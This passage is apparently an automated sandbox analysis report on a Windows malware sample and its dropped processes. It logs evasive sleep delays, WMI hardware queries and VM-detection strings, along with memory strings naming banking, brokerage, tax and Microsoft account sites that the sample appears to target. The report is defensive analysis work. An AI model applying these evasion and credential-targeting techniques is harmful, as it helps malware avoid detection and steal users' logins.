Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -37315s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -50777s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -32711s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -44204s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -47590s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -42016s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -57105s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -31420s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -55443s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -32874s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -53246s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -36387s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -30526s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -49116s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -49257s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -34086s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -32936s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -56412s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -52526s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -32075s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -50036s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -33728s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -41881s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -46955s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -36684s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8128	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -58111s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -31319s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -49340s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7172	Thread sleep time: -922337203685477s >= -30000s

Queries keyboard layouts

Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809			Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UUID FROM Win32_ComputerSystemProduct

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0041D8B1 FindFirstFileExA,	0_2_0041D8B1
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0368DB18 FindFirstFileExA,	0_2_0368DB18
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_004015C0 VirtualProtect,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	2_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	2_2_0040DB60
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	2_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	2_2_004121F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_6C72261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	3_2_6C72261E

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Code function: 2_2_00401120 GetSystemInfo,ExitProcess,

2_2_00401120

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 35511
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59836
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 48864
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32845
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 51147
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56452
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30442
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49843
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 36423
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 47963
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30339
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 36388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 34666
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53467
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 38120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 35343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54129
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 35309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 34492
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 44719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49642
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 35996
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50222
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 52005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 36184
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50385
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 42138
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32671
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 52225
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53819
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 41500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 51726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 34731
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 48714
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50658
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49494
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32649
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 44342
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 45027
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30663
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 37315
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50777
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32711
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 44204
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 47590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 42016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57105
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 31420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32874
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53246
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 36387
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30526
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49116
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 34086
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32936
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56412
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 52526
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32075
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 33728
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 41881
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 46955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 36684
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58111
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 31319
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File opened: C:\Users\user\AppData\Local\Temp\u2ts.2	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File opened: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Datacenter without Hyper-V Core
Source: cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: sx8RE6LbG0.exe, 00000000.00000002.2424148242.0000000001D9F000.00000004.00000020.00020000.00000000.sdmp, sx8RE6LbG0.exe, 00000000.00000003.2153198605.0000000001D2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Aapi.dllHyper-V RAW
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001AB6000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2530252237.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: VMWARE_VIRTUAL
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: sx8RE6LbG0.exe, 00000000.00000003.2075342633.00000000037BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BB'
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Datacenter without Hyper-V Full
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Enterprise without Hyper-V Full
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Microsoft Hyper-V Server
Source: sx8RE6LbG0.exe, 00000000.00000003.2075627426.0000000003782000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware$[
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: QEMU_HARDU
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Standard without Hyper-V Full
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Enterprise without Hyper-V Core
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
